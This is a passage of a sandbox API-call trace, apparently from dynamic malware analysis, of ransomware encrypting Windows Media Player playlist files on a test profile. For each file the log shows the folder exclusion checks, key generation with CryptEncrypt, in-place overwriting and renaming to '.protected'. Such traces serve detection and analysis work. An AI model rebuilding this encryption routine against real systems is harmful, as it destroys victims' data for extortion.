cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.033] StrStrIW 
(lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.033] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.034] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0085.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.035] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0085.036] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.036] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.036] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.036] CloseHandle (hObject=0x158) returned 1 [0085.036] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected") returned 148 [0085.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0085.037] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.037] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.037] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.037] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.037] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.037] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.038] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0085.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.039] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0085.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.039] WriteFile (in: 
hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.040] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.040] CloseHandle (hObject=0x158) returned 1 [0085.040] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 150 [0085.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0085.041] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.041] lstrcmpiW 
(lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.041] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.041] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.041] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW 
(lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.042] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0085.043] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.043] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0085.044] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.044] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.044] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.044] CloseHandle (hObject=0x158) returned 1 [0085.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 145 [0085.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0085.045] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files (x86)") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0085.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.045] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0085.045] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".rar") returned 0x0 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0085.046] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0085.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x410, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0085.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.048] CloseHandle (hObject=0x158) returned 1 [0085.048] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected") returned 146 [0085.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0085.048] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") 
returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.049] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.049] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.049] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.049] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW 
(lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.049] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0085.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0085.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.051] CloseHandle (hObject=0x158) returned 1 [0085.051] wnsprintfW (in: pszDest=0x4dfbb0, 
